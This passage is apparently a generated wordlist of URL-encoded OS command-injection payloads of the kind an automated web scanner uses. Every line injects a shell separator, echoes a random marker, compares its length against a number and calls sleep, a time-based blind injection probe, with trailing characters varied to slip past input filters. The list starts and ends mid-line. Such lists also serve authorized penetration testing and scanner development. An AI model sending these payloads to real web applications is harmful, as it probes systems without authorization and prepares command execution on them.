20str%3D%24%28echo%20HUZGZZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20HUZGZZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20HUZGZZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20HUZGZZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%3B%20str%3D%24%28echo%20ETAHJN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20ETAHJN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20ETAHJN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20ETAHJN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20ETAHJN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20ETAHJN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20ETAHJN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20ETAHJN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20ETAHJN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%7C%20%5B%201%20-ne%20%24%28echo%20TNSRYS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%202%20-ne%20%24%28echo%20TNSRYS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%203%20-ne%20%24%28echo%20TNSRYS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%204%20-ne%20%24%28echo%20TNSRYS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%205%20-ne%20%24%28echo%20TNSRYS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%206%20-ne%20%24%28echo%20TNSRYS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%207%20-ne%20%24%28echo%20TNSRYS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%208%20-ne%20%24%28echo%20TNSRYS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%209%20-ne%20%24%28echo%20TNSRYS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FOKDAL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FOKDAL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FOKDAL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FOKDAL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FOKDAL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FOKDAL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FOKDAL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FOKDAL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FOKDAL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%0A%20str%3D%24%28echo%20EGTDDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20EGTDDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20EGTDDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20EGTDDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20EGTDDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20EGTDDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20EGTDDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20EGTDDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20EGTDDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20SXGXTS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20SXGXTS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20SXGXTS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20SXGXTS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20SXGXTS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20SXGXTS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20SXGXTS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20SXGXTS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20SXGXTS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%7C%20%5B%201%20-ne%20%24%28echo%20MMQKSR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%202%20-ne%20%24%28echo%20MMQKSR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%203%20-ne%20%24%28echo%20MMQKSR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%204%20-ne%20%24%28echo%20MMQKSR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%205%20-ne%20%24%28echo%20MMQKSR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%206%20-ne%20%24%28echo%20MMQKSR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%207%20-ne%20%24%28echo%20MMQKSR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%208%20-ne%20%24%28echo%20MMQKSR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%209%20-ne%20%24%28echo%20MMQKSR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CCUVUA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CCUVUA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CCUVUA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CCUVUA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CCUVUA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CCUVUA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CCUVUA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CCUVUA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CCUVUA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%0A%20str%3D%24%28echo%20YEEJEU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20YEEJEU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20YEEJEU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20YEEJEU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20YEEJEU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20YEEJEU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20YEEJEU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20YEEJEU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20YEEJEU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%3B%20str%3D%24%28echo%20KWXVRQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KWXVRQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KWXVRQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KWXVRQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KWXVRQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KWXVRQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KWXVRQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KWXVRQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KWXVRQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%7C%20%5B%201%20-ne%20%24%28echo%20NDHYKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%202%20-ne%20%24%28echo%20NDHYKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%203%20-ne%20%24%28echo%20NDHYKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%204%20-ne%20%24%28echo%20NDHYKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%205%20-ne%20%24%28echo%20NDHYKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%206%20-ne%20%24%28echo%20NDHYKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%207%20-ne%20%24%28echo%20NDHYKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%208%20-ne%20%24%28echo%20NDHYKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%209%20-ne%20%24%28echo%20NDHYKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HMZJIQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HMZJIQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HMZJIQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HMZJIQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HMZJIQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HMZJIQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HMZJIQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HMZJIQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HMZJIQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%0A%20str%3D%24%28echo%20GQPJFY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20GQPJFY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20GQPJFY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20GQPJFY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20GQPJFY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20GQPJFY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20GQPJFY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20GQPJFY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20GQPJFY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%3B%20str%3D%24%28echo%20WSZRIR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20WSZRIR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20WSZRIR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20WSZRIR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20WSZRIR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20WSZRIR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20WSZRIR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20WSZRIR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20WSZRIR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%7C%20%5B%201%20-ne%20%24%28echo%20HDECHS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%202%20-ne%20%24%28echo%20HDECHS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%203%20-ne%20%24%28echo%20HDECHS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%204%20-ne%20%24%28echo%20HDECHS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%205%20-ne%20%24%28echo%20HDECHS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%206%20-ne%20%24%28echo%20HDECHS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%207%20-ne%20%24%28echo%20HDECHS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%208%20-ne%20%24%28echo%20HDECHS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%209%20-ne%20%24%28echo%20HDECHS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%26%20sleep%